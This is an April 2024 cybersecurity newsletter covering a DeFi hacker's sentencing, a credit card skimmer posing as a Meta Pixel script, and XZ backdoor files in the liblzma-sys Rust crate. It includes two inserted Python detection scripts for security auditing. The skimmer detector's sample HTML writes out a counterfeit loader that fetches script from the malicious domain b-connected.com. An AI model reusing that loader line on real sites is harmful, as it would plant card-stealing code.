Shakeeb Ahmed gets 3 years for $12.3M theft

Apr 17 2024



Slight technical hitch with yesterday's mailer; it's OK, we weren't hacked… 😂

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s angling to keep you hooked on staying cyber-safe while you’re surfing the net 🎣🎣🎣

Today’s hottest cybersecurity news stories:

  • 👮‍♂️ Former security engineer Shakeeb Ahmed gets 3 years for $12.3M theft 💰

  • ⚠️ Facebook users beware! Credit card skimmer LARPs as harmless tracker 💳

  • 🚪 XZ Utils backdoor test files infect popular liblzma-sys Rust crate in version 0.3.2 📦

What is this, Ahmed robbery? 👀😏💀

🚨 Former Engineer Sentenced for Cryptocurrency Exchange Hacks 🛡️

📉 Former security engineer Shakeeb Ahmed has been sentenced to three years in a U.S. prison for hacking two decentralised cryptocurrency exchanges in July 2022, pocketing over $12.3 million. Ahmed, who previously worked as a senior security engineer, utilised his expertise in smart contracts and blockchain audits to execute the hacks, as revealed by the U.S. Department of Justice.

🏙️ While Ahmed's employer remains undisclosed, it's known that he resided in Manhattan and previously worked at Amazon. Court documents indicate that Ahmed exploited security flaws in smart contracts, allowing him to inflate fees and syphon funds from the exchanges. He even attempted to negotiate with one exchange, offering to return most funds in exchange for their silence.

💸 CoinDesk reported that a portion of the stolen funds was returned anonymously, resembling a "white hat" gesture. In addition to targeting Crema Finance, Ahmed attacked Nirvana Finance, resulting in its shutdown after syphoning $3.6 million. Despite a bug bounty offer, Ahmed demanded more, leaving Nirvana uncompensated.

🔄 To cover his tracks, Ahmed laundered the stolen assets across different blockchains, using mixers like Samourai Whirlpool. As part of his sentence, he must serve jail time, undergo supervised release, and forfeit $12.3 million, paying over $5 million in restitution.

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Skim, skimmer, who's got the keys to my bimmer? 🎶🙃💀

🚨 Facebook-dwelling Credit Card Skimmer Disguised as Meta Pixel Tracker 💳

🛡️ Cybersecurity researchers have unearthed a cunning credit card skimmer concealed within a counterfeit Meta Pixel tracker script, aiming to elude detection. Injected into websites via customizable code tools like WordPress plugins and Magento admin panels, this malware masquerades as benign scripts, borrowing familiar names such as Google Analytics or jQuery.

🕵️‍♂️ The bogus Meta Pixel tracker script mimics its authentic counterpart but harbours JavaScript code that substitutes genuine domain references with malicious ones. Instead of "connect.facebook[.]net," it loads from "b-connected[.]com," hosting a malicious script ("fbevents.js") that stealthily snatches credit card details when users reach checkout pages.

💼 The compromised "b-connected[.]com" redirects data to another compromised site, "www.donjuguetes[.]es," highlighting the interconnected web of cyber threats.
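As an added illustration (not code from the original report), here is a small Python audit of the check described above: it collects every script URL a page loads, picks out loaders that pose as the Meta Pixel (fbevents.js) and flags any not fetched from connect.facebook.net. The sample HTML is constructed, and the legitimate-host set is an assumption limited to the host named in the report.

```python
import re
from typing import Dict, List
from urllib.parse import urlparse

# Hosts that legitimately serve the Meta Pixel loader; the report names only connect.facebook.net
# (assumption: no other first-party host is in use on the audited site).
LEGIT_PIXEL_HOSTS = {"connect.facebook.net"}

# External <script src="..."> tags, plus any string literal ending in /fbevents.js inside an
# inline script (the genuine bootstrap snippet passes that URL as its last argument).
SCRIPT_SRC_RE = re.compile(r"<script[^>]*\bsrc\s*=\s*['\"]([^'\"]+)['\"]", re.I)
INLINE_LOADER_RE = re.compile(r"['\"](https?://[^'\"]+/fbevents\.js)['\"]", re.I)


def audit_pixel_scripts(html: str) -> List[Dict[str, str]]:
    """Flag every Pixel-style loader (fbevents.js) that is not fetched from a Meta host."""
    findings = []
    candidates = set(SCRIPT_SRC_RE.findall(html)) | set(INLINE_LOADER_RE.findall(html))
    for url in sorted(candidates):
        if not url.lower().endswith("/fbevents.js"):
            continue  # not impersonating the Pixel loader; out of scope for this check
        host = (urlparse(url).hostname or "").lower()
        if host not in LEGIT_PIXEL_HOSTS:
            findings.append({"url": url, "host": host,
                             "reason": "fbevents.js loaded from a non-Meta host"})
    return findings


# Constructed sample: a genuine Pixel snippet, the counterfeit one from the report
# (b-connected.com), and an unrelated jQuery include that must not be flagged.
SAMPLE_HTML = """
<script>!function(f,b,e,v,n,t,s){t=b.createElement(e);t.src=v;s.parentNode.insertBefore(t,s)}
(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');
fbq('init','000000000000000');fbq('track','PageView');</script>
<script>!function(f,b,e,v,n,t,s){t=b.createElement(e);t.src=v;s.parentNode.insertBefore(t,s)}
(window,document,'script','https://b-connected.com/en_US/fbevents.js');
fbq('init','000000000000000');fbq('track','PageView');</script>
<script src="https://code.jquery.com/jquery-3.7.1.min.js"></script>
"""

if __name__ == "__main__":
    for finding in audit_pixel_scripts(SAMPLE_HTML):
        print(f"SUSPECT {finding['host']}: {finding['url']} ({finding['reason']})")
```

Run it against a saved copy of a checkout page; a hit means the Pixel snippet has been edited to point somewhere other than Meta, which is exactly the substitution the report describes.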

🛡️ To thwart such attacks, experts recommend keeping websites updated, reviewing admin accounts regularly, and frequently updating passwords. Weak passwords and plugin vulnerabilities are often exploited by threat actors to gain elevated access and execute malicious activities.

🔍 This revelation coincides with Sucuri's disclosure of Magento Shoplift malware targeting WordPress and Magento sites. These sophisticated attacks, like the MageCart e-commerce malware, underscore the evolving tactics of cybercriminals, necessitating heightened vigilance and proactive security measures.

🎣 Catch of the Day!! 🌊🐟🦞

🃏 The Motley Fool: “Fool me once, shame on — shame on you. Fool me — you can't get fooled again.” Good ol’ George Dubya 😂 Let us tell who’s not fooling around though; that’s the Crüe 👀 at Motley Fool. You’d be a fool (alright, enough already! 🙈) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! 🐛 Kidding aside, if you check out their website they’ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets 🤑 (LINK)

🚵 Wander: Find your happy place. Cue Happy Gilmore flashback 🏌️⛳🌈🕊️ Mmmm Happy Place… 😇 So, we’ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breathtaking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, it’s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels set Wander apart from your run-of-the-mill American getaway 🏞️😍 (LINK)

🌊 Digital Ocean: If you build it they will come. Nope, we’re not talking about a baseball field for ghosts 👻🍿 (Great movie, to be fair 🙈). This is the Digital Ocean who’ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website you’ll find yourself catching the buzz even if you can’t code (guilty 😑). But if you can and you’re looking for somewhere to test things out or launch something new or simply enhance what you’ve got, we’d recommend checking out their services fo’ sho 😉 And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! 🌿 (LINK)

Updating Rust is a must, must, MUST ⚠️⚠️⚠️

🚨 Backdoor Alert: XZ Utils Compromised by Test Files in Rust Crate 💻

🕵️‍♂️ Test files linked to the XZ Utils backdoor have infiltrated a Rust crate called liblzma-sys, according to recent revelations from Phylum. liblzma-sys, boasting over 21,000 downloads, offers Rust developers bindings to the liblzma implementation, a core component of XZ Utils data compression software. The affected version, 0.3.2, was singled out for scrutiny.

🛡️ "The current distribution (v0.3.2) on contains the test files for XZ that contain the backdoor," Phylum highlighted in a GitHub issue filed on April 9, 2024.

💼 In response to responsible disclosure, the contentious files ("tests/files/bad-3-corrupt_lzma2.xz" and "tests/files/good-large_compressed.lzma") were promptly removed from version 0.3.3 of liblzma-sys, released on April 10. The preceding version was swiftly withdrawn from the registry.
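An added example, not Phylum's or Snyk's tooling, of how a Rust project could check itself for the affected crate version and the named test files: it reads the pinned versions from a Cargo.lock and scans a file listing (a vendored tree or an extracted .crate tarball) for the two paths above. The Cargo.lock excerpt and the file listing are constructed samples.

```python
import re
from typing import Dict, Iterable, List

# Version reported by Phylum as shipping the backdoored XZ test files, and the two paths it named.
BAD_CRATE = "liblzma-sys"
BAD_VERSIONS = {"0.3.2"}
BAD_TEST_FILES = ("tests/files/bad-3-corrupt_lzma2.xz",
                  "tests/files/good-large_compressed.lzma")

# Cargo.lock lists each crate as a [[package]] table whose first two keys are name and version.
PACKAGE_RE = re.compile(r'\[\[package\]\]\s*\nname = "([^"]+)"\s*\nversion = "([^"]+)"')


def locked_versions(cargo_lock: str) -> Dict[str, List[str]]:
    """Map crate name -> versions pinned in a Cargo.lock (a crate may be pinned more than once)."""
    found: Dict[str, List[str]] = {}
    for name, version in PACKAGE_RE.findall(cargo_lock):
        found.setdefault(name, []).append(version)
    return found


def lock_findings(cargo_lock: str) -> List[str]:
    """Report any pinned liblzma-sys version known to carry the XZ backdoor test files."""
    return [f"{BAD_CRATE} {v} is pinned in Cargo.lock (yanked; ships XZ backdoor test files)"
            for v in locked_versions(cargo_lock).get(BAD_CRATE, []) if v in BAD_VERSIONS]


def suspicious_paths(paths: Iterable[str]) -> List[str]:
    """From a file listing, return every entry that is one of the named XZ test files."""
    return sorted(p for p in paths if p.replace("\\", "/").endswith(BAD_TEST_FILES))


# Constructed samples: a Cargo.lock excerpt pinning the affected version, and a vendor listing.
SAMPLE_LOCK = """\
[[package]]
name = "libc"
version = "0.2.0"

[[package]]
name = "liblzma-sys"
version = "0.3.2"
"""
SAMPLE_LISTING = [
    "vendor/liblzma-sys-0.3.2/src/lib.rs",
    "vendor/liblzma-sys-0.3.2/tests/files/bad-3-corrupt_lzma2.xz",
    "vendor/liblzma-sys-0.3.2/tests/files/good-large_compressed.lzma",
]

if __name__ == "__main__":
    print("\n".join(lock_findings(SAMPLE_LOCK) + suspicious_paths(SAMPLE_LISTING)))
```

As the Snyk quote below notes, the files are inert without the matching build instructions, but their presence still marks a crate version that should be bumped to 0.3.3 or later.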

🔍 "The malicious test files were committed upstream, but due to the malicious build instructions not being present in the upstream repository, they were never called or executed," stated Snyk in its advisory.

📉 The XZ Utils backdoor saga began when Microsoft engineer Andres Freund detected nefarious commits impacting versions 5.6.0 and 5.6.1, released in February and March 2024, respectively. The backdoor circumvented SSH authentication controls, potentially granting remote code execution privileges to attackers.

🛡️ According to SentinelOne researchers, the actor behind the backdoor, operating under the alias Jia Tan, gradually gained trust within the XZ Utils community over two years. The modus operandi involved subtle code changes aimed at enhancing the backdoor's sophistication and evading detection.

🌐 The multifaceted operation involved social engineering tactics, suggesting a coordinated effort using phoney developer accounts. Despite the early discovery and restoration of the XZ Utils repository, the intricate nature of the backdoor hints at a state-sponsored threat actor's involvement, raising concerns about future supply chain attacks.

🗞️ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • 🛡️ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday 📅

  • 💵 Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for 🆓

  • 📈 Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future 👾

Let us know what you think!

So long and thanks for reading all the phish!
